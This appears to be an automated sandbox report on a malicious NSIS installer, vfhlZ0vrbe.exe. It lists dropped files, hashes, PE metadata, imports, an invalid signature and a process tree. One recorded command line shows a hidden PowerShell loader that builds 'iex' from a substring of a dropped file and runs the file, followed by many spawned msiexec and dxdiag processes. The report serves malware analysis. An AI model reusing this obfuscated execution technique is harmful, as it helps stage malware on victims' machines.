                        SSDEEP:768:rwjkYAiCysuvu8hRx0bgnXrNhXKeZNrbxiHfPx+lHTI+PNITz8bwIvGG76LkqWOq:rw0KY+z/hl8VzPBZ6iXc6d
                        MD5:E8A9F81281E8ED1DAA1A9FA98C11DA97
                        SHA1:87BB542C6175A4B51A4C8F4C35B93244B84DF88C
                        SHA-256:0333AE760111805FA8801B65D07659CE36DBDFF05BBCA40F1305238A4E9B94AC
                        SHA-512:87F3741D3EEA36C8559183F4307F7DACE6A3F39971FA813C13DA4C734038E34EF4D70F580CE9F96F0637EAE9093557159A56620FB9DFA51D6DBA882C621837BF
                        Malicious:false
                        Preview:..........?.......................X....................................j.-..................................................................Z.......................................................2....................\......................................k......................64.......N.K......3........D............................................................B...............................................................................F....................o......d...............................................3.................L....e.......Z......................................................................2...............................1..............................F.z.........................................i.......................0..........z...Q.....4..........l................................................0..............................<.........................H..................^.................$......................................................L...........

                        C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\characteriser\grmmelserne.uns

                        Download File
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):413602
                        Entropy (8bit):1.2424037027559116
                        Encrypted:false
                        SSDEEP:1536:n3axPycbUHvtclWN2TTHn3tJqChok8dEhx:EycwHv+lWN+z3jnCfdm
                        MD5:5414789DC51920495C97F8F8CD9EAC2A
                        SHA1:69D800A2463D4B0AEB7AA656EB9037659239C9DB
                        SHA-256:D32BF488FC11B9848CB4A2CC7EDD285D90316558F626833DA0E157BE515A99B7
                        SHA-512:B58A857363EEF41D3861F2D27FEF888A418D383E3F11D4C1F80684E7996539A1A2470C86933C69446FB215D7534A0EDDE12DC85DDC2A4BCDF58009F406C7329D
                        Malicious:false
                        Preview:.......................................E................................9..............................................................................................................................................................................................................y.......................................................n.F..................................................................+-I.....7.................0...........[................................!.......................v...............l.y................................................._.........................................................................................................................b.................................................................2....................H...................................................................p.....................................t........................................~....................../...........N.........................................

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4l0eaezd.s4b.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvfi1ioj.wh2.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohvjsmqc.bmp.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5vf1bf3.ivj.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\nsExec.dll

                        Download File
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):6656
                        Entropy (8bit):5.178709395875687
                        Encrypted:false
                        SSDEEP:96:z0OBtYZKtPsrqBApt1JHpb9XWk7Qe06iE6mE6YNFyVOHd0+uPHwEX:4tZKtrAJJJbP7iEHEbN8Ved0Ph
                        MD5:4A2F4FE4A3AD1DE56EE6BF7DD4923963
                        SHA1:7CC68B94448C964FD99904E5784B059AED4D5DAA
                        SHA-256:89B1E6509A1B45B32933E9D785A9C8C5B9CE7C616E1112DCF7FC3FA5CA27EBDE
                        SHA-512:4B6BBE75BEAFAE9A29932FF5DDD3940AADFAE62C157836E6CDAB755955782DD5354D5EB389B4B8C16BF59F4CE7A099A0161D915C1CF2968F28E195DC8E3997EA
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        • Antivirus: Virustotal, Detection: 0%, Browse
                        Joe Sandbox View:
                        • Filename: HJEbEB40vP.exe, Detection: malicious, Browse
                        • Filename: HJEbEB40vP.exe, Detection: malicious, Browse
                        • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                        • Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious, Browse
                        • Filename: Order 00293884800595.bat.exe, Detection: malicious, Browse
                        • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                        • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                        • Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious, Browse
                        • Filename: Order 00293884800595.bat.exe, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):7.5021233572287045
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:vfhlZ0vrbe.exe
                        File size:1'366'152 bytes
                        MD5:d29c88c314347eb87810e85e1e90a1f1
                        SHA1:37082bccbde394171014c6a23ba59867fd0db181
                        SHA256:122e9453d8424952667d1fbac82b31ccf2ab4076d14f306d1d97d675bc6fe213
                        SHA512:02880cc151b76ce8449d551ba421ddfffff5ffde708dd78f4c1579d4c60eee3035be3acdec97a9c7a3cf7647359e14e2a4c86d35bafddfdb2f967b04cca3bae9
                        SSDEEP:24576:gdcS1TkwkCSNeu4lIG8YM2xNB9NID3Fg3+oTc6oI:mX1TkwTSEbJ8YM2xD9NI5gOoT9n
                        TLSH:1C55E0E3A6110E89C67D92FD8617C154510A6F7ED8A8D60A31B3366FFDB3D438C4E84A
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L....C.f.................h...x.......3............@

                        File Icon

                        Icon Hash:fd3ecf696931318d

                        Static PE Info

                        General

                        Entrypoint:0x4033d8
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x660843F9 [Sat Mar 30 16:55:21 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:671f2a1f8aee14d336bab98fea93d734

                        Authenticode Signature

                        Signature Valid:false
                        Signature Issuer:CN=Statshemmelighedernes, O=Statshemmelighedernes, L=Savannah, C=US
                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                        Error Number:-2146762487
                        Not Before, Not After
                        • 21/09/2024 04:50:04 21/09/2027 04:50:04
                        Subject Chain
                        • CN=Statshemmelighedernes, O=Statshemmelighedernes, L=Savannah, C=US
                        Version:3
                        Thumbprint MD5:70FE4C29C07922A1881187DA11975537
                        Thumbprint SHA-1:2D6AFEDCD35966043371A5DD3B74AAD0EB577C48
                        Thumbprint SHA-256:2AE8393C09496DA50E960EA05F42935D79B27C2A01D1CB8B204476645505E1F0
                        Serial:66DCFB9754438D507EB16CB8846F70CE31F3051B

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        sub esp, 00000224h
                        push esi
                        push edi
                        xor edi, edi
                        push 00008001h
                        mov dword ptr [ebp-14h], edi
                        mov dword ptr [ebp-0Ch], 0040A188h
                        mov dword ptr [ebp-08h], edi
                        mov byte ptr [ebp-04h], 00000020h
                        call dword ptr [0040809Ch]
                        mov esi, dword ptr [004080A0h]
                        lea eax, dword ptr [ebp-000000C4h]
                        push eax
                        mov dword ptr [ebp-000000B0h], edi
                        mov dword ptr [ebp-30h], edi
                        mov dword ptr [ebp-2Ch], edi
                        mov dword ptr [ebp-000000C4h], 0000009Ch
                        call esi
                        test eax, eax
                        jne 00007F77D4CDFF41h
                        lea eax, dword ptr [ebp-000000C4h]
                        mov dword ptr [ebp-000000C4h], 00000094h
                        push eax
                        call esi
                        cmp dword ptr [ebp-000000B4h], 02h
                        jne 00007F77D4CDFF2Ch
                        movsx cx, byte ptr [ebp-000000A3h]
                        mov al, byte ptr [ebp-000000B0h]
                        sub ecx, 30h
                        sub al, 53h
                        mov byte ptr [ebp-2Ah], 00000004h
                        neg al
                        sbb eax, eax
                        not eax
                        and eax, ecx
                        mov word ptr [ebp-30h], ax
                        cmp dword ptr [ebp-000000B4h], 02h
                        jnc 00007F77D4CDFF24h
                        and byte ptr [ebp-2Ah], 00000000h
                        cmp byte ptr [ebp-000000AFh], 00000041h
                        jl 00007F77D4CDFF13h
                        movsx ax, byte ptr [ebp-000000AFh]
                        sub eax, 40h
                        mov word ptr [ebp-30h], ax
                        jmp 00007F77D4CDFF06h
                        mov word ptr [ebp-30h], di
                        cmp dword ptr [ebp-000000C0h], 0Ah
                        jnc 00007F77D4CDFF0Ah
                        and word ptr [ebp+00000000h], 0000h

                        Rich Headers

                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x853c0xa0.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x430000x637b0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x14cf400x948
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x294.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x660c0x68003b90adcd2f1248db844446cb2ef15486False0.6663912259615384data6.411908920093797IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x80000x13400x1400b3bd9ad1bd1020c5cf4d51a4d7b61e07False0.4576171875data5.237673976044139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xa0000x251380x600c4e774255fea540ed5efa114edfa6420False0.4635416666666667data4.1635686587741IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .ndata0x300000x130000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x430000x637b00x638007ec750b400c18fb2808562fed9408957False0.28931032113693467data5.302493764322081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0x433280x4180cDevice independent bitmap graphic, 255 x 510 x 32, image size 260100EnglishUnited States0.24935519940365264
                        RT_ICON0x84b380x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.3378238495208802
                        RT_ICON0x953600x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.38897939878074417
                        RT_ICON0x9e8080x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.43522673594709493
                        RT_ICON0xa2a300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.46856846473029046
                        RT_ICON0xa4fd80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.559016393442623
                        RT_ICON0xa59600x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.6312056737588653
                        RT_DIALOG0xa5dc80x120dataEnglishUnited States0.5138888888888888
                        RT_DIALOG0xa5ee80x11cdataEnglishUnited States0.6056338028169014
                        RT_DIALOG0xa60080xc4dataEnglishUnited States0.5918367346938775
                        RT_DIALOG0xa60d00x60dataEnglishUnited States0.7291666666666666
                        RT_GROUP_ICON0xa61300x68dataEnglishUnited States0.7788461538461539
                        RT_VERSION0xa61980x2d8dataEnglishUnited States0.47527472527472525
                        RT_MANIFEST0xa64700x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                        Imports

                        DLLImport
                        ADVAPI32.dllRegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA
                        SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA
                        ole32.dllOleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree
                        COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                        USER32.dllSetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcA, GetMessagePos, CheckDlgButton, LoadCursorA, SetCursor, GetSysColor, SetWindowPos, GetWindowLongA, IsWindowEnabled, SetClassLongA, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetDlgItemTextA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, MessageBoxIndirectA, CharPrevA, PeekMessageA, GetClassInfoA, DispatchMessageA, TrackPopupMenu
                        GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor
                        KERNEL32.dllCreateFileA, GetTempFileNameA, ReadFile, RemoveDirectoryA, CreateProcessA, CreateDirectoryA, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceA, lstrcpynA, SetErrorMode, GetVersionExA, lstrlenA, GetCommandLineA, GetTempPathA, GetWindowsDirectoryA, WriteFile, ExitProcess, CopyFileA, GetCurrentProcess, GetModuleFileNameA, GetFileSize, GetTickCount, Sleep, SetFileAttributesA, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv, lstrcpyA, MoveFileExA, lstrcatA, WideCharToMultiByte, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableA

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        No network behavior found

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:22:35:47
                        Start date:10/01/2025
                        Path:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\vfhlZ0vrbe.exe"
                        Imagebase:0x400000
                        File size:1'366'152 bytes
                        MD5 hash:D29C88C314347EB87810E85E1E90A1F1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:2
                        Start time:22:35:47
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) "
                        Imagebase:0x1d0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:3
                        Start time:22:35:47
                        Start date:10/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7b52e0000
                        File size:875'008 bytes
                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:4
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:5
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:6
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:8
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0xed0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:9
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:10
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:11
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:12
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:13
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:14
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:15
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:16
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:17
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:18
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:19
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:20
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:21
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:22
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
